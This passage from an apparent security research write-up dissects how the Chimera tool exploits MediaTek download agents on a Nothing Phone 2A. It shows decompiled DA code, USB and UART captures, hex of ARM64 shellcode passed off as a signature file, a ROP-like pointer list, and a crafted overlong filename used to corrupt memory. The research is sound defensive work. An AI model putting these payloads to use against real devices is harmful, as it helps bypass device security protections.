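    print(loader.handle(CMD_JUMP_DA))
```

&lt;p&gt;With DAA enabled and a bad signature, the same &lt;code&gt;CMD_JUMP_DA&lt;/code&gt; call raises instead of jumping, which mirrors the assert-and-reboot path.&lt;/p&gt;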
&lt;h1&gt;Chimera&lt;/h1&gt;
&lt;p&gt;Our target was relatively clear: figure out how Chimera was exploiting patched DAs. The first step was to capture USB traffic between Chimera and a target device.&lt;/p&gt;
&lt;p&gt;For our target, we went with the Nothing Phone 2A, which runs a MediaTek Dimensity 7200 Pro and is listed under Chimera&apos;s supported devices.&lt;/p&gt;
&lt;p&gt;Chimera is one of the more &quot;premium&quot; GSM tools out there, and it shows; VM detection, USB packet capture detection, and various other anti-analysis techniques make it clear the developers have put real effort into preventing reverse engineering.&lt;/p&gt;
&lt;h2&gt;USB Capture&lt;/h2&gt;
&lt;p&gt;Chimera&apos;s anti-analysis means you can&apos;t just fire up Wireshark and start capturing packets. Instead, we relied on a &lt;a href=&quot;https://www.totalphase.com/products/beagle-usb480/&quot;&gt;physical USB sniffer&lt;/a&gt; to capture traffic between Chimera and the device.&lt;/p&gt;
&lt;p&gt;We&apos;ve used this device before and it works well, though I&apos;ll admit it&apos;s absurdly expensive. You could probably hack together a cheaper alternative, but that&apos;s a project for another day.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://www.totalphase.com/media/catalog/product/b/e/beagle480std-rgb144.jpg&quot; width=&quot;50%&quot; alt=&quot;Beagle USB 480&quot; /&gt;
&lt;/div&gt;
&lt;h2&gt;UART&lt;/h2&gt;
&lt;p&gt;Capturing USB traffic is only half the battle; we also needed to see what the DA was doing on the device itself. For that, we used UART.&lt;/p&gt;
&lt;p&gt;Thankfully, &lt;a href=&quot;http://github.com/AntiEngineer&quot;&gt;@AntiEngineer&lt;/a&gt; had already spent hours probing the board with a logic analyzer to find the UART pins. He put together a nice setup that proved invaluable for this research.&lt;/p&gt;
&lt;p&gt;On the Nothing Phone 2A, UART is accessible through two small pads behind the main camera module:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Motherboard&lt;/th&gt;
&lt;th&gt;UART pins&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/MEWOTHING_2aP.png&quot; alt=&quot;Nothing Phone 2A motherboard&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/MEWOTHING_2aP_label.png&quot; alt=&quot;Nothing Phone 2A motherboard with UART pins labeled&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;BROM outputs UART at &lt;code&gt;115200&lt;/code&gt; &lt;strong&gt;8N1&lt;/strong&gt;, while everything that comes after (Preloader, DAs, etc.) runs at &lt;code&gt;921600&lt;/code&gt; &lt;strong&gt;8N1&lt;/strong&gt; by default.&lt;/p&gt;
&lt;p&gt;We used a &lt;a href=&quot;https://www.amazon.es/-/en/Fasizi-Converter-CH340G-Serial-Adapter/dp/B09Z2GZVZY&quot;&gt;cheap TTL-USB adapter&lt;/a&gt; to connect the pads to our computer. For serial interaction, I personally recommend &lt;a href=&quot;https://github.com/tio/tio&quot;&gt;tio&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;One annoying quirk about this device (and probably many others) is that UART logs get cut off during Preloader initialization as soon as you see the &lt;code&gt;Log Turned Off.&lt;/code&gt; message.&lt;/p&gt;
&lt;p&gt;This is controlled by a global variable called &lt;code&gt;g_log_switch&lt;/code&gt;. During boot, the Preloader checks if a certain key combination is held (usually volume up or down) and sets the switch accordingly.&lt;/p&gt;
&lt;p&gt;If the switch is off, &lt;code&gt;outchar()&lt;/code&gt; skips calling &lt;code&gt;PutUARTByte()&lt;/code&gt; entirely, so nothing gets printed. The logs are still written to a DRAM buffer, but you won&apos;t see them over UART:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void outchar(const char c)
{
    if (g_log_disable) {
        if (log_ptr &amp;lt; log_end)
            *log_ptr++ = (char)c;
        else
            g_log_miss_chrs++;
    } else {
        if (get_log_switch()) {
            PutUARTByte(c);
#if (CFG_DRAM_LOG_TO_STORAGE)
            log_to_storage(c);
#endif
        }
        pl_log_store(c);
    }

#if (CFG_OUTPUT_PL_LOG_TO_UART1)
    PutUART1_Byte(c);
#endif
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Getting the Capture&lt;/h2&gt;
&lt;p&gt;With our capture environment set up, we proceeded to capture a full Chimera session. I&apos;d like to thank &lt;a href=&quot;https://t.me/erdilS&quot;&gt;@erdilS&lt;/a&gt; for lending us his Chimera license for this research :)!&lt;/p&gt;
&lt;p&gt;The tool is expensive, and I wasn&apos;t about to spend that much money for what was supposed to be a simple one-off analysis (spoiler: it wasn&apos;t :D).&lt;/p&gt;
&lt;p&gt;The capture uses a proprietary format that can only be opened with &lt;a href=&quot;https://www.totalphase.com/products/data-center/&quot;&gt;Total Phase&apos;s Data Center&lt;/a&gt; software. It&apos;s not as fancy as Wireshark, but it gets the job done.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/data-center-01.png&quot; alt=&quot;Data Center screenshot&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;Dissecting the Exploit&lt;/h1&gt;
&lt;p&gt;With the capture in hand, it was time to figure out what Chimera was actually doing.&lt;/p&gt;
&lt;p&gt;The plan was simple, or so we thought: extract the DAs, compare them against known good copies, and trace through the USB traffic to find where things get interesting.&lt;/p&gt;
&lt;h2&gt;Extracting the DAs&lt;/h2&gt;
&lt;p&gt;The first thing we did was extract both DAs from the capture and compare them against &lt;a href=&quot;https://archive.diablosat.cc/firmwares/amt-dumps/NothingDA/MT6886_NOTHING_0.bin&quot;&gt;the ones we had previously dumped from the official Nothing Flash Tool&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The hashes matched, so Chimera is using unmodified DAs with the same build date as the official tool:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;============================================================
DA Header Type: V6
Number of SoCs: 1
============================================================
[SoC 0]
  DA Mode: V6
  HW Code     : 0x1229
  HW Sub Code : 0x8A00
  Magic       : 0xDADA
  Regions     : 3
  Region 0: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 1: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 2: Offset: 0x96EBC, Length: 0x59930, Addr: 0x40000000, Region Length: 0x59830, Sig Len: 0x100
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks to this, we know we&apos;re dealing with a V6 DA built for HW code &lt;code&gt;0x1229&lt;/code&gt; (Dimensity 7200 / 7200 Pro). To load them in Ghidra, use base address &lt;code&gt;0x2000000&lt;/code&gt; for DA1 and &lt;code&gt;0x40000000&lt;/code&gt; for DA2.&lt;/p&gt;
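&lt;p&gt;The numbers in that dump are easy to sanity-check. The sketch below splits a region into its body and its trailing signature using the offsets and lengths printed above. &lt;code&gt;Region&lt;/code&gt; and &lt;code&gt;split_region&lt;/code&gt; are hypothetical helper names, and the zero-filled buffer is just a stand-in for the real DA file.&lt;/p&gt;

```python
from typing import NamedTuple


class Region(NamedTuple):
    offset: int     # position of the region inside the DA file
    length: int     # total bytes, signature included
    load_addr: int  # address the region is loaded at
    sig_len: int    # bytes of signature appended at the end


def split_region(da_file, region):
    """Return (body, signature) for one region of a DA file."""
    blob = da_file[region.offset:region.offset + region.length]
    if len(blob) != region.length:
        raise ValueError("DA file is shorter than the region claims")
    body_len = region.length - region.sig_len
    return blob[:body_len], blob[body_len:]


# Values copied from the dump above.
DA1 = Region(offset=0xBC, length=0x96E00, load_addr=0x2000000, sig_len=0x100)
DA2 = Region(offset=0x96EBC, length=0x59930, load_addr=0x40000000, sig_len=0x100)

if __name__ == "__main__":
    # Stand-in for the real file: zero bytes of the right total size.
    fake_da = bytes(DA2.offset + DA2.length)
    body, sig = split_region(fake_da, DA2)
    print(hex(len(body)), hex(len(sig)))
    print(hex(DA1.offset + DA1.length))
```

&lt;p&gt;The body length comes out as the &lt;code&gt;Region Length&lt;/code&gt; field (&lt;code&gt;0x59830&lt;/code&gt; for DA2), and DA1 ends exactly where DA2 begins (&lt;code&gt;0x96EBC&lt;/code&gt;), so the regions are packed back to back.&lt;/p&gt;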
&lt;p&gt;One thing worth noting is that V6 DAs can run in either ARM64 or ARM32 (non-THUMB) mode, which made porting the exploit a bit annoying later on.&lt;/p&gt;
&lt;p&gt;In our specific case, both stages are ARM64, so we analyze them as AARCH64 (ARMv8) Little Endian.&lt;/p&gt;
&lt;h2&gt;Tracing the USB Traffic&lt;/h2&gt;
&lt;p&gt;We started by analyzing the full boot sequence: Preloader receiving DA1 over USB, verifying its signature, and jumping to it.&lt;/p&gt;
&lt;p&gt;Then DA1 does the same for DA2: receives it, verifies it, and transfers execution. Nothing unusual there, everything looked standard (mind you, we really wasted an entire night analyzing ~37100 packets of boring USB traffic).&lt;/p&gt;
&lt;p&gt;While running Chimera, I also tried to catch UART logs hoping for some useful debug output, but it ended up being useless. They set the log level to &lt;code&gt;ERROR&lt;/code&gt; right after DA1 starts using &lt;code&gt;CMD:SET-RUNTIME-PARAMETER&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;da&amp;gt;
    &amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;
    &amp;lt;command&amp;gt;CMD:SET-RUNTIME-PARAMETER&amp;lt;/command&amp;gt;
    &amp;lt;arg&amp;gt;
        &amp;lt;checksum_level&amp;gt;NONE&amp;lt;/checksum_level&amp;gt;
        &amp;lt;da_log_level&amp;gt;ERROR&amp;lt;/da_log_level&amp;gt;
        &amp;lt;log_channel&amp;gt;UART&amp;lt;/log_channel&amp;gt;
        &amp;lt;battery_exist&amp;gt;AUTO-DETECT&amp;lt;/battery_exist&amp;gt;
        &amp;lt;system_os&amp;gt;LINUX&amp;lt;/system_os&amp;gt;
    &amp;lt;/arg&amp;gt;
    &amp;lt;adv&amp;gt;
        &amp;lt;initialize_dram&amp;gt;YES&amp;lt;/initialize_dram&amp;gt;
    &amp;lt;/adv&amp;gt;
&amp;lt;/da&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This basically tells both DA1 and DA2 not to spit logs to UART unless they&apos;re errors, so instead of useful debug traces, we got mostly silence:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;***dagent_command_loop:***

@Protocol: Tx START-CMD(&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt;&amp;lt;host&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:START&amp;lt;/command&amp;gt;&amp;lt;/host&amp;gt;)

@Protocol: Rx Host CMD(&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;da&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:SET-RUNTIME-PARAMETER&amp;lt;/command&amp;gt;&amp;lt;arg&amp;gt;&amp;lt;checksum_level&amp;gt;NONE&amp;lt;/checksum_level&amp;gt;&amp;lt;da_log_level&amp;gt;ERROR&amp;lt;/da_log_level&amp;gt;&amp;lt;log_channel&amp;gt;UART&amp;lt;/log_channel&amp;gt;&amp;lt;battery_exist&amp;gt;AUTO-DETECT&amp;lt;/battery_exist&amp;gt;&amp;lt;system_os&amp;gt;LINUX&amp;lt;/system_os&amp;gt;&amp;lt;/arg&amp;gt;&amp;lt;adv&amp;gt;&amp;lt;initialize_dram&amp;gt;YES&amp;lt;/initialize_dram&amp;gt;&amp;lt;/adv&amp;gt;&amp;lt;/da&amp;gt;)

@Protocol: Execute CMD(CMD:SET-RUNTIME-PARAMETER)
[SPMI] spmi_init_1 done
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
Not BOOT_TRAP_EMMC_UFS
Host notice error or user canceled.
Unsupported command.m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
m6PdmNI8gVjIZrq5ERR: start_record_device_action failed[0xc0010001].
ERR: end_record_device_action failed[0xc0010001].
&lt;/code&gt;&lt;/pre&gt;
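&lt;p&gt;For reference, the &lt;code&gt;CMD:SET-RUNTIME-PARAMETER&lt;/code&gt; request from the capture can be rebuilt with the standard library. This is a minimal sketch: &lt;code&gt;build_runtime_parameter&lt;/code&gt; is a hypothetical helper, the field values are the ones Chimera sent, and which other &lt;code&gt;da_log_level&lt;/code&gt; strings the DA accepts is not something the capture shows, so the parameter only marks where the value goes. Transport framing is not covered.&lt;/p&gt;

```python
import xml.etree.ElementTree as ET


def build_runtime_parameter(log_level="ERROR", log_channel="UART"):
    """Build a CMD:SET-RUNTIME-PARAMETER request as UTF-8 bytes."""
    da = ET.Element("da")
    ET.SubElement(da, "version").text = "1.0"
    ET.SubElement(da, "command").text = "CMD:SET-RUNTIME-PARAMETER"

    # Same fields, in the same order, as the captured request.
    arg = ET.SubElement(da, "arg")
    fields = [
        ("checksum_level", "NONE"),
        ("da_log_level", log_level),
        ("log_channel", log_channel),
        ("battery_exist", "AUTO-DETECT"),
        ("system_os", "LINUX"),
    ]
    for tag, value in fields:
        ET.SubElement(arg, tag).text = value

    adv = ET.SubElement(da, "adv")
    ET.SubElement(adv, "initialize_dram").text = "YES"

    # xml_declaration requires Python 3.8 or newer.
    return ET.tostring(da, encoding="UTF-8", xml_declaration=True)


if __name__ == "__main__":
    print(build_runtime_parameter().decode("utf-8"))
```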
&lt;p&gt;Going back to the USB capture, the interesting stuff only started happening once DA2 was fully loaded.&lt;/p&gt;
&lt;p&gt;At first glance, we noticed that the very first thing Chimera did was issue two &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; commands, but one of them looked slightly off.&lt;/p&gt;
&lt;p&gt;A quick look at the capture revealed the following sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Send &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; with a normal filename&lt;/li&gt;
&lt;li&gt;Send the AIO file data (which looks like ARM64 code, not a real signature)&lt;/li&gt;
&lt;li&gt;Send another &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; with an absurdly long filename full of special characters&lt;/li&gt;
&lt;li&gt;Send a second AIO file&lt;/li&gt;
&lt;li&gt;Intentionally trigger an error by not sending the expected ACK&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This was clearly deliberate. But why send two AIO commands? And what&apos;s with the weird filename?&lt;/p&gt;
&lt;h2&gt;The AIO command&lt;/h2&gt;
&lt;p&gt;To understand what&apos;s going on, we analyzed what &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; is supposed to do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int cmd_security_set_all_in_one_signature(com_channel_struct *channel,char *xml)
{
  int status;
  mxml_node_t *tree;
  char *file_name;
  uint32_t all_in_one_sig_sz;
  uint8_t *all_in_one_sig;
  
  tree = mxmlLoadString((mxml_node_t *)0x0,xml,MXML_OPAQUE_CALLBACK);
  if (tree == (mxml_node_t *)0x0) {
    status = -0x3ffeffff;
    set_error_msg(&quot;Required XML node path not found. Check command string.&quot;);
  }
  else {
    file_name = mxmlGetNodeText(tree,&quot;da/arg/source_file&quot;);
    if (file_name == (char *)0x0) {
      status = -0x3ffeffff;
      set_error_msg(&quot;Required XML node path not found. Check command string.&quot;);
    }
    else {
      all_in_one_sig = (uint8_t *)0x0;
      all_in_one_sig_sz = 0;
      status = fp_read_host_file(channel,file_name,&amp;amp;all_in_one_sig,&amp;amp;all_in_one_sig_sz, &quot;Signature&quot;);
      if (status &amp;lt; 0) {
        free(all_in_one_sig);
      }
      else {
        set_all_in_one_signature_buffer(all_in_one_sig,all_in_one_sig_sz);
      }
    }
    mxmlDelete(tree);
  }
  return status;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The command first parses the XML using &lt;code&gt;mxmlLoadString&lt;/code&gt; (which allocates memory for the parsed tree), then extracts the &lt;code&gt;source_file&lt;/code&gt; argument and calls &lt;code&gt;fp_read_host_file&lt;/code&gt; to download that file from the host.&lt;/p&gt;
&lt;p&gt;Looking at &lt;code&gt;fp_read_host_file&lt;/code&gt;, we can see it allocates a buffer for the incoming data if the passed pointer is null:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int fp_read_host_file(com_channel_struct *channel, char *file_name, char **ppdata,
                      uint32_t *pdata_len, char *info)
{
  // ... escape filename and send download request to host ...
  
  // read total length from host
  bytes_read = (*channel-&amp;gt;read)(buf_total_length, &amp;amp;length);
  if (bytes_read == 0) {
    // ... parse response ...
    total_length = atoll(vec[1]);
    total_len = (uint)total_length;
    
    if ((*ppdata == (char *)0x0) || (*pdata_len == 0)) {
      // allocate buffer for file data
      *pdata_len = total_len;
      error_msg = (char *)malloc(total_length + 4 &amp;amp; 0xffffffff);
      *ppdata = error_msg;
      if (error_msg != (char *)0x0) goto consume_data;
      // ...
    }
    
consume_data:
    (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
    // ... read file data into buffer ...
  }
  // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Back in &lt;code&gt;cmd_security_set_all_in_one_signature&lt;/code&gt;, if &lt;code&gt;fp_read_host_file&lt;/code&gt; returns an error, the allocated buffer gets freed.&lt;/p&gt;
&lt;p&gt;Otherwise, &lt;code&gt;set_all_in_one_signature_buffer&lt;/code&gt; stores it in a global variable. Either way, &lt;code&gt;mxmlDelete(tree)&lt;/code&gt; cleans up the XML tree at the end.&lt;/p&gt;
&lt;p&gt;In normal usage, this command provides the DA with an &quot;all-in-one&quot; signature file containing cryptographic signatures for every partition on the device, allowing the DA to verify images during flashing without needing separate signature files for each partition.&lt;/p&gt;
&lt;p&gt;The first &lt;code&gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&lt;/code&gt; Chimera sends looks perfectly normal, except the file content doesn&apos;t look like a valid AIO signature at all:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  fd 7b be a9 f3 0b 00 f9  fd 03 00 91 b3 02 00 f0  |.{..............|
00000010  73 02 1b 91 e0 03 13 aa  f5 35 00 94 e0 03 13 aa  |s........5......|
00000020  f3 0b 40 f9 fd 7b c2 a8  c0 03 5f d6 e0 03 13 aa  |..@..{...._.....|
00000030  e8 03 00 aa e8 03 00 f0  08 e9 43 b9 08 41 00 51  |..........C..A.Q|
... more lines omitted for brevity ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The astute reader will notice this looks suspiciously like ARM64 instructions. The first four bytes &lt;code&gt;fd 7b be a9&lt;/code&gt; correspond to the typical function prologue &lt;code&gt;stp x29, x30, [sp, #-0x20]!&lt;/code&gt;.&lt;/p&gt;
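&lt;p&gt;As a sanity check, that encoding can be decoded by hand. The following is a minimal Python sketch, not part of the original analysis: &lt;code&gt;decode_stp_pre_index&lt;/code&gt; is a hypothetical helper that only handles the 64-bit pre-indexed &lt;code&gt;stp&lt;/code&gt; form and returns the two stored registers, the base register, and the byte offset.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def decode_stp_pre_index(raw):
    # A64 instructions are stored as little-endian 32-bit words
    word = int.from_bytes(raw, &quot;little&quot;)
    # bits 31..22 identify a 64-bit STP with pre-indexed addressing
    if word &amp;gt;&amp;gt; 22 != 0b1010100110:
        raise ValueError(&quot;not a 64-bit pre-indexed STP&quot;)
    rt = word &amp;amp; 0x1F             # first register
    rn = (word &amp;gt;&amp;gt; 5) &amp;amp; 0x1F      # base register (31 means sp in this form)
    rt2 = (word &amp;gt;&amp;gt; 10) &amp;amp; 0x1F    # second register
    imm7 = (word &amp;gt;&amp;gt; 15) &amp;amp; 0x7F
    if imm7 &amp;amp; 0x40:              # sign-extend the 7-bit immediate
        imm7 -= 0x80
    return rt, rt2, rn, imm7 * 8  # the immediate is scaled by 8 bytes

print(decode_stp_pre_index(bytes.fromhex(&quot;fd7bbea9&quot;)))  # (29, 30, 31, -32)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Registers 29 and 30 are &lt;code&gt;x29&lt;/code&gt; and &lt;code&gt;x30&lt;/code&gt;, base register 31 is &lt;code&gt;sp&lt;/code&gt;, and -32 is &lt;code&gt;-0x20&lt;/code&gt;.&lt;/p&gt;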
&lt;p&gt;The second AIO file was equally strange: a bunch of what looked like pointers, possibly a ROP chain?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  cc 24 06 40 00 00 00 00  cc 24 06 40 00 00 00 00  |.$.@.....$.@....|
00000010  34 ec 03 40 00 00 00 00  f4 f7 02 40 00 00 00 00  |4..@.......@....|
00000020  00 ac 05 40 00 00 00 00  9c a7 00 40 00 00 00 00  |...@.......@....|
00000030  f0 f1 01 40 00 00 00 00  3c e8 02 40 00 00 00 00  |...@....&amp;lt;..@....|
... more lines omitted for brevity ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Little did we know, most of both files were just padding or junk data that Chimera added to confuse analysis. More on that later.&lt;/p&gt;
&lt;p&gt;At this point, we weren&apos;t sure what any of this meant. But the weird filename in the second command was the more obvious lead.&lt;/p&gt;
&lt;p&gt;For the second command, Chimera sent an absurdly long filename full of special characters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;&amp;lt;da&amp;gt;&amp;lt;version&amp;gt;1.0&amp;lt;/version&amp;gt;&amp;lt;command&amp;gt;CMD:SECURITY-SET-ALLINONE-SIGNATURE&amp;lt;/command&amp;gt;&amp;lt;arg&amp;gt;&amp;lt;source_file&amp;gt;
;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;gt;&amp;amp;lt;;&amp;amp;quot;;&amp;amp;amp;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;&amp;amp;lt;;;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;quot;;;;;;;;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;&amp;amp;gt;&amp;amp;gt;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;gt;;;;;;&amp;amp;quot;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;&amp;amp;quot;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;gt;;;;;;;;;;;&amp;amp;amp;&amp;amp;gt;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;&amp;amp;amp;&amp;amp;gt;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;&amp;amp;lt;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;&amp;amp;quot;;;;;&amp;amp;lt;;&amp;amp;lt;;;;;;;&amp;amp;amp;&amp;amp;gt;;&amp;amp;lt;&amp;amp;quot;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;&amp;amp;lt;&amp
;amp;amp;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;&amp;amp;quot;;;;;&amp;amp;gt;;;;&amp;amp;quot;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;amp;&amp;amp;gt;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;lt;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;amp;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;lt;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;lt;;;;;;&amp;amp;quot;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;&amp;amp;gt;;;&amp;amp;lt;;;&amp;amp;gt;;;;;&amp;amp;amp;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;gt;;;;;;;;&amp;amp;amp;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;&amp;amp;gt;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;&amp;amp;gt;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;lt;;;;&amp;amp;lt;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;quot;;&amp;amp;lt;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;quot;;;&amp;amp;quot;;;;;;;;;;
